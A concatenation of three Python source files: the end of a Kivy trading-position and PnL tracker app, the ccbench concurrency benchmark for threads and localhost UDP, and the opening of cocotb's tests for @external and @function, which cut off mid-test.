self.fees_layout = BoxLayout(orientation='horizontal',
padding=[10, 0, 10, 0])
self.fees_label = Label(text='',
pos_hint={'center_x': .9, 'center_y': .9},
size_hint=(0.1, 0.1))
self.update_fees_label()
self.fees_layout.add_widget(self.fees_label)
self.fees_up = Button(text='+',
pos_hint={'center_x': .9, 'center_y': .9},
size_hint=(0.03, 0.1))
self.fees_up.bind(on_press=self.on_press_fees_up)
self.fees_layout.add_widget(self.fees_up)
self.fees_down = Button(text='-',
pos_hint={'center_x': .9, 'center_y': .9},
size_hint=(0.03, 0.1))
self.fees_down.bind(on_press=self.on_press_fees_down)
self.fees_layout.add_widget(self.fees_down)
self.fees_window = Popup(title='Fees',
size_hint=(0.5, 0.5),
background_color=[1, 1, 1, .5],
content=self.fees_layout)
self.button_fees = Button(text='Fees',
pos_hint={'center_x': .5, 'center_y': .5})
self.button_fees.bind(on_press=self.on_press_fees)
self.settings_buttons.add_widget(self.button_fees)
self.button_about = Button(text='About',
pos_hint={'center_x': .5, 'center_y': .5})
self.button_about.bind(on_press=self.on_press_about)
self.settings_buttons.add_widget(self.button_about)
self.popup_settings.add_widget(self.settings_buttons)
self.set_display_mode(None, load_up=True)
self.reset_pnl() # for display mode text
self.update_symbol_label() # set up label
return self.main_layout
def load_user_data(self):
"""
loads cached user data from the last run
"""
if self.store.exists(self._DEF_DATAJSON_NAME):
try:
data = self.store.get(self._DEF_DATAJSON_NAME)
self._DEF_SYM = data['_SYM']
self._DEF_DISP_MODE = data['_DEF_DISP_MODE']
self._DEFAULT_NEWS_MODE = data['_DEFAULT_NEWS_MODE']
self._DEFAULT_FEES = data['_DEFAULT_FEES']
self._DEF_CUM_PNL = data['cum_pnl']
except KeyError:
pass # no data will be loaded
self.apply_user_data()
def apply_user_data(self):
"""
applies default / loaded settings to current run
"""
self.current_symbol = self._DEF_SYM
self.current_display_mode = self._DEF_DISP_MODE
self.news_status = self._DEFAULT_NEWS_MODE
self.user_fees = self._DEFAULT_FEES
self.cumulative_pnl = self._DEF_CUM_PNL
def save_user_data(self, *args):
"""
save current data
"""
self.store.put(self._DEF_DATAJSON_NAME,
_SYM=self.current_symbol,
_DEF_DISP_MODE=self.current_display_mode,
_DEFAULT_NEWS_MODE=self.news_status,
_DEFAULT_FEES=self.user_fees,
cum_pnl=self.cumulative_pnl)
def start_news_flasher(self):
"""
will be triggered upon button press and at launch
"""
Thread(target=self.news_fetcher.news_manager, args=(self.flash_news, self.news_status), daemon=True).start()
def reset_news_label(self):
"""
set back to empty text after newsflash is over
"""
self.news_label.text = ''
def flash_news(self, text):
"""
display a newsflash
"""
def_y_pos = self.news_label.pos[1]
pos = 5000
counter = 2 * pos
self.news_label.pos = (pos, def_y_pos)
self.news_label.text = text
while counter > 0 and self.news_status:
pos -= 1.5
counter -= 1
self.news_label.pos = (pos, def_y_pos)
sleep(0.01)
self.reset_news_label()
def set_display_mode(self, instance, load_up=False):
"""
sets 0 for dark mode, 1 for light mode
"""
if not load_up:
self.current_display_mode = 0 if self.current_display_mode else 1
self.button_display_mode.text = self.display_mode_mapping[self.current_display_mode]
with self.main_layout.canvas.before:
if self.current_display_mode == 1:
Color(*self._LIGHT_MODE_RGB)
self.button_refresh.background_normal = 'icons/light_mode/refresh_icon_light.png'
self.button_refresh.background_down = 'icons/light_mode/refresh_icon_light.png'
self.button_settings.background_normal = 'icons/light_mode/settings_icon_light.png'
self.button_settings.background_down = 'icons/light_mode/settings_icon_light.png'
Rectangle(size=(9999, 9999))
else:
Color(*self._DARK_MODE_RGB)
self.button_refresh.background_normal = 'icons/dark_mode/refresh_icon_dark.png'
self.button_refresh.background_down = 'icons/dark_mode/refresh_icon_dark.png'
self.button_settings.background_normal = 'icons/dark_mode/settings_icon_dark.png'
self.button_settings.background_down = 'icons/dark_mode/settings_icon_dark.png'
self.main_layout.canvas.before.clear()
self.entry_price_label.color = self._TEXT_COLOR_LIGHTMODE if self.current_display_mode else \
self._TEXT_COLOR_DARKMODE
self.news_label.color = self._TEXT_COLOR_LIGHTMODE if self.current_display_mode else \
self._TEXT_COLOR_DARKMODE
if self.pnl_label.text == self.zero_pnl: # if zero pnl
self.pnl_label.color = self._TEXT_COLOR_LIGHTMODE if self.current_display_mode else \
self._TEXT_COLOR_DARKMODE
self.update_cum_pnl_label()
self.update_position_label()
def start_ticker(self, symbol: str):
"""
start a new ticker on a new thread
* fetches all tickers and verifies symbol exists
* passes `self.on_price_update` as the callback method
"""
if symbol.upper() in self.price_fetcher.get_all_symbols():
Thread(target=self.price_fetcher.connect_ws, args=(symbol, self.on_price_update), daemon=True).start()
while not self.last_price:
sleep(0.05)
else:
raise Exception(f"ticker {symbol} does not exist")
def stop_ticker(self, symbol: str):
"""
stop ticker (kill stream and thread)
"""
self.price_fetcher.disconnect_ws(symbol)
def change_ticker(self, instance, new_symbol: str):
"""
disconnects old symbol stream and connects a new one
uses first fetch via REST for illiquid pairs
"""
self.stop_ticker(self.current_symbol)
self.reset_pnl()
self.reset_position()
self.current_symbol = new_symbol
self.update_symbol_label()
self.start_ticker(new_symbol)
self.main_symbol_button.text = new_symbol
def on_press_news(self, instance):
"""
enable / disable newsflash
"""
self.news_status = not self.news_status
if not self.news_status:
self.news_fetcher.turn_off()
else:
self.start_news_flasher()
self.button_news.text = self.generate_news_button_text()
def generate_news_button_text(self):
"""
generate label for news toggler based on status
"""
return f'Display news - {self.news_status}'
def update_fees_label(self):
"""
update fees button label
"""
self.user_fees = round(self.user_fees, 2)
self.fees_label.text = f"{self.user_fees}"
def on_press_fees(self, instance):
"""
Open the `fees` popup window
"""
self.fees_window.open()
def on_press_fees_up(self, instance):
"""
increments fees and updates label
"""
self.user_fees += 0.01
self.update_fees_label()
def on_press_fees_down(self, instance):
"""
decrements fees and updates label
"""
self.user_fees -= 0.01
self.update_fees_label()
def on_press_about(self, instance):
"""
Open the `about` popup window
"""
self.about_window.open()
@staticmethod
def on_ref_press(*args):
"""
open ref link
"""
webbrowser.open(args[1])
def on_press_sell(self, instance):
"""
if no pos - enter short
if long - close pos
"""
if self.current_position == 0:
self.current_position = -1
self.entry_price = self.last_price
elif self.current_position == 1:
self.reset_position()
self.update_status_labels()
def on_press_buy(self, instance):
"""
if no pos - enter long
if short - close pos
"""
if self.current_position == 0:
self.current_position = 1
self.entry_price = self.last_price
elif self.current_position == -1:
self.reset_position()
self.update_status_labels()
def on_press_refresh(self, instance):
"""
when pressing refresh button
"""
self.reset_cum_pnl()
def on_press_settings(self, instance):
"""
when pressing settings button
"""
self.open_settings_menu()
def open_settings_menu(self):
"""
opens the settings popup menu
"""
self.popup_settings.open()
def apply_fees(self):
"""
apply fees to pnl
"""
self.current_pnl -= self.user_fees
def reset_cum_pnl(self):
"""
resets cumulative pnl
"""
self.cumulative_pnl = 0.0
self.update_cum_pnl_label()
def update_status_labels(self):
"""
updates:
* entry price label
* position label
* cumulative pnl label
"""
self.update_entry_label()
self.update_position_label()
self.update_cum_pnl_label()
def reset_position(self):
"""
* updates cumulative pnl (with fees)
* resets position status
* resets entry price
* resets pos pnl
"""
self.cumulative_pnl += (self.current_pnl - self.user_fees)
self.current_position = 0
self.entry_price = 0
self.reset_pnl()
self.update_position_label()
self.update_entry_label()
def reset_pnl(self):
"""Reset pnl label"""
self.pnl_label.text = self.zero_pnl
self.pnl_label.color = self._TEXT_COLOR_LIGHTMODE if self.current_display_mode else self._TEXT_COLOR_DARKMODE
def on_price_update(self, price):
"""
will be passed as callback to ws stream
"""
self.update_pnl(price)
precision = self.price_fetcher.get_symbol_precision(self.current_symbol)
self.price_label.text = f'{price:.{precision}f}'
if price > self.last_price:
self.price_label.color = get_color_from_hex(self._GREEN_HEX)
else:
self.price_label.color = get_color_from_hex(self._RED_HEX)
self.last_price = price
def update_pnl(self, price):
"""
calculates current position PnL and updates the label accordingly
takes user fees into account
"""
if self.current_position != 0:
self.current_pnl = (self.entry_price / price)
self.current_pnl = (self.current_pnl - 1) * 100 if self.current_position == -1 else \
(1 - self.current_pnl) * 100
self.apply_fees()
self.pnl_label.text = f'{self.current_pnl:.{self._PNL_PERC}f}%'
if self.current_pnl > 0:
self.pnl_label.color = get_color_from_hex(self._GREEN_HEX)
elif self.current_pnl < 0:
self.pnl_label.color = get_color_from_hex(self._RED_HEX)
else:
self.reset_pnl()
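# Illustrative example (not part of the original source): for a long position
# entered at 100 with the price now at 110, entry/price = 100/110 ≈ 0.9091,
# so current_pnl = (1 - 0.9091) * 100 ≈ 9.09% before fees are subtracted.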
def update_symbol_label(self):
"""
Updates the symbol label
"""
self.symbol_label.text = self.current_symbol
def update_entry_label(self):
"""
Updates the entry price label
"""
precision = self.price_fetcher.get_symbol_precision(self.current_symbol)
self.entry_price_label.text = f'{self.entry_price:.{precision}f}'
def update_position_label(self):
"""
Updates current position label
"""
self.pos_str_label.text = self.position_mapping[self.current_position]
if self.current_position > 0:
self.pos_str_label.color = get_color_from_hex(self._GREEN_HEX)
elif self.current_position < 0:
self.pos_str_label.color = get_color_from_hex(self._RED_HEX)
else:
self.pos_str_label.color = self._TEXT_COLOR_LIGHTMODE if self.current_display_mode else \
self._TEXT_COLOR_DARKMODE
def update_cum_pnl_label(self):
"""
Updates cumulative PNL label
"""
self.cum_pnl_label.text = f"{round(self.cumulative_pnl, 2)}%"
if self.cumulative_pnl > 0:
self.cum_pnl_label.color = get_color_from_hex(self._GREEN_HEX)
elif self.cumulative_pnl < 0:
self.cum_pnl_label.color = get_color_from_hex(self._RED_HEX)
else:
self.cum_pnl_label.color = self._TEXT_COLOR_LIGHTMODE if self.current_display_mode \
else self._TEXT_COLOR_DARKMODE
self.save_user_data()
if __name__ == "__main__":
app = MainApp()
app.run()
|
ccbench.py | # -*- coding: utf-8 -*-
# This file should be kept compatible with both Python 2.6 and Python >= 3.0.
from __future__ import division
from __future__ import print_function
"""
ccbench, a Python concurrency benchmark.
"""
import time
import os
import sys
import functools
import itertools
import threading
import subprocess
import socket
from optparse import OptionParser, SUPPRESS_HELP
import platform
# Compatibility
try:
xrange
except NameError:
xrange = range
try:
map = itertools.imap
except AttributeError:
pass
THROUGHPUT_DURATION = 2.0
LATENCY_PING_INTERVAL = 0.1
LATENCY_DURATION = 2.0
BANDWIDTH_PACKET_SIZE = 1024
BANDWIDTH_DURATION = 2.0
def task_pidigits():
"""Pi calculation (Python)"""
_map = map
_count = itertools.count
_islice = itertools.islice
def calc_ndigits(n):
# From http://shootout.alioth.debian.org/
def gen_x():
return _map(lambda k: (k, 4*k + 2, 0, 2*k + 1), _count(1))
def compose(a, b):
aq, ar, as_, at = a
bq, br, bs, bt = b
return (aq * bq,
aq * br + ar * bt,
as_ * bq + at * bs,
as_ * br + at * bt)
def extract(z, j):
q, r, s, t = z
return (q*j + r) // (s*j + t)
def pi_digits():
z = (1, 0, 0, 1)
x = gen_x()
while 1:
y = extract(z, 3)
while y != extract(z, 4):
z = compose(z, next(x))
y = extract(z, 3)
z = compose((10, -10*y, 0, 1), z)
yield y
return list(_islice(pi_digits(), n))
return calc_ndigits, (50, )
def task_regex():
"""regular expression (C)"""
# XXX this task gives horrendous latency results.
import re
# Taken from the `inspect` module
pat = re.compile(r'^(\s*def\s)|(.*(?<!\w)lambda(:|\s))|^(\s*@)', re.MULTILINE)
with open(__file__, "r") as f:
arg = f.read(2000)
def findall(s):
t = time.time()
try:
return pat.findall(s)
finally:
print(time.time() - t)
return pat.findall, (arg, )
def task_sort():
"""list sorting (C)"""
def list_sort(l):
l = l[::-1]
l.sort()
return list_sort, (list(range(1000)), )
def task_compress_zlib():
"""zlib compression (C)"""
import zlib
with open(__file__, "rb") as f:
arg = f.read(5000) * 3
def compress(s):
zlib.decompress(zlib.compress(s, 5))
return compress, (arg, )
def task_compress_bz2():
"""bz2 compression (C)"""
import bz2
with open(__file__, "rb") as f:
arg = f.read(3000) * 2
def compress(s):
bz2.compress(s)
return compress, (arg, )
def task_hashing():
"""SHA1 hashing (C)"""
import hashlib
with open(__file__, "rb") as f:
arg = f.read(5000) * 30
def compute(s):
hashlib.sha1(s).digest()
return compute, (arg, )
throughput_tasks = [task_pidigits, task_regex]
for mod in 'bz2', 'hashlib':
try:
globals()[mod] = __import__(mod)
except ImportError:
globals()[mod] = None
# For whatever reasons, zlib gives irregular results, so we prefer bz2 or
# hashlib if available.
# (NOTE: hashlib releases the GIL from 2.7 and 3.1 onwards)
if bz2 is not None:
throughput_tasks.append(task_compress_bz2)
elif hashlib is not None:
throughput_tasks.append(task_hashing)
else:
throughput_tasks.append(task_compress_zlib)
latency_tasks = throughput_tasks
bandwidth_tasks = [task_pidigits]
class TimedLoop:
def __init__(self, func, args):
self.func = func
self.args = args
def __call__(self, start_time, min_duration, end_event, do_yield=False):
step = 20
niters = 0
duration = 0.0
_time = time.time
_sleep = time.sleep
_func = self.func
_args = self.args
t1 = start_time
while True:
for i in range(step):
_func(*_args)
t2 = _time()
# If another thread terminated, the current measurement is invalid
# => return the previous one.
if end_event:
return niters, duration
niters += step
duration = t2 - start_time
if duration >= min_duration:
end_event.append(None)
return niters, duration
if t2 - t1 < 0.01:
# Minimize interference of measurement on overall runtime
step = step * 3 // 2
elif do_yield:
# OS scheduling of Python threads is sometimes so bad that we
# have to force thread switching ourselves, otherwise we get
# completely useless results.
_sleep(0.0001)
t1 = t2
def run_throughput_test(func, args, nthreads):
assert nthreads >= 1
# Warm up
func(*args)
results = []
loop = TimedLoop(func, args)
end_event = []
if nthreads == 1:
# Pure single-threaded performance, without any switching or
# synchronization overhead.
start_time = time.time()
results.append(loop(start_time, THROUGHPUT_DURATION,
end_event, do_yield=False))
return results
started = False
ready_cond = threading.Condition()
start_cond = threading.Condition()
ready = []
def run():
with ready_cond:
ready.append(None)
ready_cond.notify()
with start_cond:
while not started:
start_cond.wait()
results.append(loop(start_time, THROUGHPUT_DURATION,
end_event, do_yield=True))
threads = []
for i in range(nthreads):
threads.append(threading.Thread(target=run))
for t in threads:
t.setDaemon(True)
t.start()
# We don't want measurements to include thread startup overhead,
# so we arrange for timing to start after all threads are ready.
with ready_cond:
while len(ready) < nthreads:
ready_cond.wait()
with start_cond:
start_time = time.time()
started = True
start_cond.notify(nthreads)
for t in threads:
t.join()
return results
def run_throughput_tests(max_threads):
for task in throughput_tasks:
print(task.__doc__)
print()
func, args = task()
nthreads = 1
baseline_speed = None
while nthreads <= max_threads:
results = run_throughput_test(func, args, nthreads)
# Taking the max duration rather than average gives pessimistic
# results rather than optimistic.
speed = sum(r[0] for r in results) / max(r[1] for r in results)
print("threads=%d: %d" % (nthreads, speed), end="")
if baseline_speed is None:
print(" iterations/s.")
baseline_speed = speed
else:
print(" ( %d %%)" % (speed / baseline_speed * 100))
nthreads += 1
print()
LAT_END = "END"
def _sendto(sock, s, addr):
sock.sendto(s.encode('ascii'), addr)
def _recv(sock, n):
return sock.recv(n).decode('ascii')
def latency_client(addr, nb_pings, interval):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
_time = time.time
_sleep = time.sleep
def _ping():
_sendto(sock, "%r\n" % _time(), addr)
# The first ping signals the parent process that we are ready.
_ping()
# We give the parent a bit of time to notice.
_sleep(1.0)
for i in range(nb_pings):
_sleep(interval)
_ping()
_sendto(sock, LAT_END + "\n", addr)
def run_latency_client(**kwargs):
cmd_line = [sys.executable, '-E', os.path.abspath(__file__)]
cmd_line.extend(['--latclient', repr(kwargs)])
return subprocess.Popen(cmd_line) #, stdin=subprocess.PIPE,
#stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def run_latency_test(func, args, nthreads):
# Create a listening socket to receive the pings. We use UDP which should
# be painlessly cross-platform.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("127.0.0.1", 0))
addr = sock.getsockname()
interval = LATENCY_PING_INTERVAL
duration = LATENCY_DURATION
nb_pings = int(duration / interval)
results = []
threads = []
end_event = []
start_cond = threading.Condition()
started = False
if nthreads > 0:
# Warm up
func(*args)
results = []
loop = TimedLoop(func, args)
ready = []
ready_cond = threading.Condition()
def run():
with ready_cond:
ready.append(None)
ready_cond.notify()
with start_cond:
while not started:
start_cond.wait()
loop(start_time, duration * 1.5, end_event, do_yield=False)
for i in range(nthreads):
threads.append(threading.Thread(target=run))
for t in threads:
t.setDaemon(True)
t.start()
# Wait for threads to be ready
with ready_cond:
while len(ready) < nthreads:
ready_cond.wait()
# Run the client and wait for the first ping(s) to arrive before
# unblocking the background threads.
chunks = []
process = run_latency_client(addr=sock.getsockname(),
nb_pings=nb_pings, interval=interval)
s = _recv(sock, 4096)
_time = time.time
with start_cond:
start_time = _time()
started = True
start_cond.notify(nthreads)
while LAT_END not in s:
s = _recv(sock, 4096)
t = _time()
chunks.append((t, s))
# Tell the background threads to stop.
end_event.append(None)
for t in threads:
t.join()
process.wait()
for recv_time, chunk in chunks:
# NOTE: it is assumed that a line sent by a client wasn't received
# in two chunks because the lines are very small.
for line in chunk.splitlines():
line = line.strip()
if line and line != LAT_END:
send_time = eval(line)
assert isinstance(send_time, float)
results.append((send_time, recv_time))
return results
def run_latency_tests(max_threads):
for task in latency_tasks:
print("Background CPU task:", task.__doc__)
print()
func, args = task()
nthreads = 0
while nthreads <= max_threads:
results = run_latency_test(func, args, nthreads)
n = len(results)
# We print out milliseconds
lats = [1000 * (t2 - t1) for (t1, t2) in results]
#print(list(map(int, lats)))
avg = sum(lats) / n
dev = (sum((x - avg) ** 2 for x in lats) / n) ** 0.5
print("CPU threads=%d: %d ms. (std dev: %d ms.)" % (nthreads, avg, dev), end="")
print()
#print(" [... from %d samples]" % n)
nthreads += 1
print()
BW_END = "END"
def bandwidth_client(addr, packet_size, duration):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("127.0.0.1", 0))
local_addr = sock.getsockname()
_time = time.time
_sleep = time.sleep
def _send_chunk(msg):
_sendto(sock, ("%r#%s\n" % (local_addr, msg)).rjust(packet_size), addr)
# We give the parent some time to be ready.
_sleep(1.0)
try:
start_time = _time()
end_time = start_time + duration * 2.0
i = 0
while _time() < end_time:
_send_chunk(str(i))
s = _recv(sock, packet_size)
assert len(s) == packet_size
i += 1
_send_chunk(BW_END)
finally:
sock.close()
def run_bandwidth_client(**kwargs):
cmd_line = [sys.executable, '-E', os.path.abspath(__file__)]
cmd_line.extend(['--bwclient', repr(kwargs)])
return subprocess.Popen(cmd_line) #, stdin=subprocess.PIPE,
#stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def run_bandwidth_test(func, args, nthreads):
# Create a listening socket to receive the packets. We use UDP which should
# be painlessly cross-platform.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("127.0.0.1", 0))
addr = sock.getsockname()
duration = BANDWIDTH_DURATION
packet_size = BANDWIDTH_PACKET_SIZE
results = []
threads = []
end_event = []
start_cond = threading.Condition()
started = False
if nthreads > 0:
# Warm up
func(*args)
results = []
loop = TimedLoop(func, args)
ready = []
ready_cond = threading.Condition()
def run():
with ready_cond:
ready.append(None)
ready_cond.notify()
with start_cond:
while not started:
start_cond.wait()
loop(start_time, duration * 1.5, end_event, do_yield=False)
for i in range(nthreads):
threads.append(threading.Thread(target=run))
for t in threads:
t.setDaemon(True)
t.start()
# Wait for threads to be ready
with ready_cond:
while len(ready) < nthreads:
ready_cond.wait()
# Run the client and wait for the first packet to arrive before
# unblocking the background threads.
process = run_bandwidth_client(addr=addr,
packet_size=packet_size,
duration=duration)
_time = time.time
# This will also wait for the parent to be ready
s = _recv(sock, packet_size)
remote_addr = eval(s.partition('#')[0])
with start_cond:
start_time = _time()
started = True
start_cond.notify(nthreads)
n = 0
first_time = None
while not end_event and BW_END not in s:
_sendto(sock, s, remote_addr)
s = _recv(sock, packet_size)
if first_time is None:
first_time = _time()
n += 1
end_time = _time()
end_event.append(None)
for t in threads:
t.join()
process.kill()
return (n - 1) / (end_time - first_time)
def run_bandwidth_tests(max_threads):
for task in bandwidth_tasks:
print("Background CPU task:", task.__doc__)
print()
func, args = task()
nthreads = 0
baseline_speed = None
while nthreads <= max_threads:
results = run_bandwidth_test(func, args, nthreads)
speed = results
#speed = len(results) * 1.0 / results[-1][0]
print("CPU threads=%d: %.1f" % (nthreads, speed), end="")
if baseline_speed is None:
print(" packets/s.")
baseline_speed = speed
else:
print(" ( %d %%)" % (speed / baseline_speed * 100))
nthreads += 1
print()
def main():
usage = "usage: %prog [-h|--help] [options]"
parser = OptionParser(usage=usage)
parser.add_option("-t", "--throughput",
action="store_true", dest="throughput", default=False,
help="run throughput tests")
parser.add_option("-l", "--latency",
action="store_true", dest="latency", default=False,
help="run latency tests")
parser.add_option("-b", "--bandwidth",
action="store_true", dest="bandwidth", default=False,
help="run I/O bandwidth tests")
parser.add_option("-i", "--interval",
action="store", type="int", dest="check_interval", default=None,
help="sys.setcheckinterval() value")
parser.add_option("-I", "--switch-interval",
action="store", type="float", dest="switch_interval", default=None,
help="sys.setswitchinterval() value")
parser.add_option("-n", "--num-threads",
action="store", type="int", dest="nthreads", default=4,
help="max number of threads in tests")
# Hidden option to run the pinging and bandwidth clients
parser.add_option("", "--latclient",
action="store", dest="latclient", default=None,
help=SUPPRESS_HELP)
parser.add_option("", "--bwclient",
action="store", dest="bwclient", default=None,
help=SUPPRESS_HELP)
options, args = parser.parse_args()
if args:
parser.error("unexpected arguments")
if options.latclient:
kwargs = eval(options.latclient)
latency_client(**kwargs)
return
if options.bwclient:
kwargs = eval(options.bwclient)
bandwidth_client(**kwargs)
return
if not options.throughput and not options.latency and not options.bandwidth:
options.throughput = options.latency = options.bandwidth = True
if options.check_interval:
sys.setcheckinterval(options.check_interval)
if options.switch_interval:
sys.setswitchinterval(options.switch_interval)
print("== %s %s (%s) ==" % (
platform.python_implementation(),
platform.python_version(),
platform.python_build()[0],
))
# Processor identification often has repeated spaces
cpu = ' '.join(platform.processor().split())
print("== %s %s on '%s' ==" % (
platform.machine(),
platform.system(),
cpu,
))
print()
if options.throughput:
print("--- Throughput ---")
print()
run_throughput_tests(options.nthreads)
if options.latency:
print("--- Latency ---")
print()
run_latency_tests(options.nthreads)
if options.bandwidth:
print("--- I/O bandwidth ---")
print()
run_bandwidth_tests(options.nthreads)
if __name__ == "__main__":
main()
|
test_external.py | # Copyright (c) 2013, 2018 Potential Ventures Ltd
# Copyright (c) 2013 SolarFlare Communications Inc
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Potential Ventures Ltd,
# SolarFlare Communications Inc nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL POTENTIAL VENTURES LTD BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
A set of tests that demonstrate cocotb functionality
Also used as a regression test of cocotb capabilities
"""
import threading
import pytest
import cocotb
from cocotb.clock import Clock
from cocotb.decorators import external
from cocotb.triggers import ReadOnly, RisingEdge, Timer
from cocotb.utils import get_sim_time
def return_two(dut):
return 2
@cocotb.function
async def await_two_clock_edges(dut):
await RisingEdge(dut.clk)
await RisingEdge(dut.clk)
await Timer(1, units="ns")
dut._log.info("Returning from await_two_clock_edges")
return 2
def calls_cocotb_function(dut):
return await_two_clock_edges(dut)
def print_sim_time(dut, base_time):
# We are not calling out here so time should not advance
# And should also remain consistent
for _ in range(5):
_t = get_sim_time("ns")
dut._log.info("Time reported = %d", _t)
assert _t == base_time
dut._log.info("external function has ended")
@cocotb.test()
async def test_time_in_external(dut):
"""
Test that the simulation time does not advance if the wrapped external
routine does not call @function
"""
await Timer(10, units="ns")
time = get_sim_time("ns")
dut._log.info("Time at start of test = %d" % time)
for i in range(100):
dut._log.info("Loop call %d" % i)
await external(print_sim_time)(dut, time)
time_now = get_sim_time("ns")
await Timer(10, units="ns")
assert time == time_now
# Cadence simulators: "Unable set up RisingEdge(...) Trigger" with VHDL (see #1076)
@cocotb.test(
expect_error=cocotb.triggers.TriggerException
if cocotb.SIM_NAME.startswith(("xmsim", "ncsim")) and cocotb.LANGUAGE in ["vhdl"]
else ()
)
async def test_time_in_function(dut):
"""
Test that an @external function calling back into a cocotb @function
takes the expected amount of time
"""
@cocotb.function
def wait_cycles(dut, n):
for _ in range(n):
yield RisingEdge(dut.clk)
@external
def wait_cycles_wrapper(dut, n):
return wait_cycles(dut, n)
cocotb.start_soon(Clock(dut.clk, 100, units="ns").start())
await Timer(10, units="ns")
for n in range(5):
for i in range(20):
await RisingEdge(dut.clk)
time = get_sim_time("ns")
expected_after = time + 100 * n
await wait_cycles_wrapper(dut, n)
time_after = get_sim_time("ns")
assert expected_after == time_after
# Cadence simulators: "Unable set up RisingEdge(...) Trigger" with VHDL (see #1076)
@cocotb.test(
expect_error=cocotb.triggers.TriggerException
if cocotb.SIM_NAME.startswith(("xmsim", "ncsim")) and cocotb.LANGUAGE in ["vhdl"]
else ()
)
async def test_external_call_return(dut):
"""
Test ability to await an external function that is not a coroutine using @external
"""
async def clock_monitor(dut):
count = 0
while True:
await RisingEdge(dut.clk)
await Timer(1000, units="ns")
count += 1
cocotb.start_soon(clock_monitor(dut))
cocotb.start_soon(Clock(dut.clk, 100, units="ns").start())
value = await external(return_two)(dut)
assert value == 2
@cocotb.test()
async def test_consecutive_externals(dut):
"""
Test that multiple @external functions can be called in the same test
"""
value = await external(return_two)(dut)
dut._log.info("First one completed")
assert value == 2
value = await external(return_two)(dut)
dut._log.info("Second one completed")
assert value == 2
@cocotb.test()
async def test_external_from_readonly(dut):
"""
Test that @external functions that don't consume simulation time
can be called from ReadOnly state
"""
await ReadOnly()
dut._log.info("In readonly")
value = await external(return_two)(dut)
assert value == 2
@cocotb.test()
async def test_function_from_readonly(dut):
"""
Test that @external functions that call @functions that await Triggers
can be called from ReadOnly state
"""
cocotb.start_soon(Clock(dut.clk, 100, units="ns").start())
await ReadOnly()
dut._log.info("In readonly")
value = await external(calls_cocotb_function)(dut)
assert value == 2
# Cadence simulators: "Unable set up RisingEdge(...) Trigger" with VHDL (see #1076)
@cocotb.test(
expect_error=cocotb.triggers.TriggerException
if cocotb.SIM_NAME.startswith(("xmsim", "ncsim")) and cocotb.LANGUAGE in ["vhdl"]
else ()
)
async def test_function_that_awaits(dut):
"""
Test that @external functions can call @function coroutines that
awaits Triggers and return values back through to
the test
"""
cocotb.start_soon(Clock(dut.clk, 100, units="ns").start())
value = await external(calls_cocotb_function)(dut)
assert value == 2
# Cadence simulators: "Unable set up RisingEdge(...) Trigger" with VHDL (see #1076)
@cocotb.test(
expect_error=cocotb.triggers.TriggerException
if cocotb.SIM_NAME.startswith(("xmsim", "ncsim")) and cocotb.LANGUAGE in ["vhdl"]
else ()
)
async def test_await_after_function(dut):
"""
Test that awaiting a Trigger works after returning
from @external functions that call @functions that consume
simulation time
"""
cocotb.start_soon(Clock(dut.clk, 100, units="ns").start())
value = await external(calls_cocotb_function)(dut)
assert value == 2
await Timer(10, units="ns")
await RisingEdge(dut.clk)
# Cadence simulators: "Unable set up RisingEdge(...) Trigger" with VHDL (see #1076)
@cocotb.test(
expect_error=cocotb.triggers.TriggerException
if cocotb.SIM_NAME.startswith(("xmsim", "ncsim")) and cocotb.LANGUAGE in ["vhdl"]
else ()
)
async def test_external_from_start_soon(dut):
"""
Test that @external functions work when awaited from a forked
task
"""
async def run_function(dut):
value = await external(calls_cocotb_function)(dut)
return value
async def run_external(dut):
value = await external(return_two)(dut)
return value
cocotb.start_soon(Clock(dut.clk, 100, units="ns").start())
coro1 = cocotb.start_soon(run_function(dut))
value = await coro1.join()
assert value == 2
dut._log.info("Back from join 1")
value = 0
coro2 = cocotb.start_soon(run_external(dut))
value = await coro2.join()
assert value == 2
dut._log.info("Back from join 2")
@cocotb.test()
async def test_external_raised_exception(dut):
"""
Test that exceptions thrown by @external functions can be caught
"""
@external
def func():
raise ValueError()
with pytest.raises(ValueError):
await func()
@cocotb.test()
async def test_external_returns_exception(dut):
"""
Test that exceptions can be returned by @external functions
"""
@external
def func():
return ValueError()
result = await func()
assert isinstance(result, ValueError)
@cocotb.test()
async def test_function_raised_exception(dut):
"""
Test that exceptions thrown by @function coroutines can be caught
"""
@cocotb.function
async def func():
raise ValueError()
@external
def ext():
return func()
with pytest.raises(ValueError):
await ext()
@cocotb.test()
async def test_function_returns_exception(dut):
"""
Test that exceptions can be returned by @function coroutines
"""
@cocotb.function
def gen_func():
return ValueError()
yield
@external
def ext():
return gen_func()
result = await ext()
assert isinstance(result, ValueError)
@cocotb.test()
async def test_function_from_weird_thread_fails(dut):
"""
Test that background threads calling a @function do not hang forever
"""
func_started = False
caller_resumed = False
